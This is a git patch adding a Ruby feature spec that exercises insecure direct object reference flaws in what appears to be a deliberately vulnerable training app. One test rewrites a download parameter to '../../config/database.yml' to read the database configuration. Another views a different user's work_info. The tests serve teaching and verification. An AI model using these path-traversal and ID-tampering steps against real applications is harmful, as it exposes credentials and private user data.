From 8e238e1d81224d1bca21899778ac133075e662f1 Mon Sep 17 00:00:00 2001
From: chrismo <chrismo@clabs.org>
Date: Fri, 27 Sep 2013 18:05:45 -0500
Subject: [PATCH] Insecure Direct Object Reference spec added.

This includes two scenarios - the work_info one mentioned in the
tutorials, but also one allowing downloading of source code, which may
belong somewhere else as I haven't worked through all the tutorials yet.
---
 spec/features/insecure_dor_spec.rb | 29 +++++++++++++++++++++++++++++
 1 file changed, 29 insertions(+)
 create mode 100644 spec/features/insecure_dor_spec.rb

diff --git a/spec/features/insecure_dor_spec.rb b/spec/features/insecure_dor_spec.rb
new file mode 100644
index 0000000..b0ac570
--- /dev/null
+++ b/spec/features/insecure_dor_spec.rb
@@ -0,0 +1,29 @@
+require 'spec_helper'
+
+feature 'insecure direct object reference' do
+  before do
+    UserFixture.reset_all_users
+    @normal_user = UserFixture.normal_user
+  end
+
+  scenario 'download production configuration' do
+    login(@normal_user)
+
+    visit "/users/#{@normal_user.user_id}/benefit_forms"
+    download_url = first('.widget-body a')[:href]
+    visit download_url.sub(/name=(.*?)&/, 'name=../../config/database.yml&')
+
+    page.status_code.should == 200
+    page.response_headers['Content-Disposition'].should include('database.yml')
+    page.response_headers['Content-Length'].should == '576'
+  end
+
+  scenario 'view any user work_info' do
+    login(@normal_user)
+
+    @normal_user.user_id.should_not == 2
+    visit '/users/2/work_info'
+
+    first('td').text.should == 'Jack Mannino'
+  end
+end
\ No newline at end of file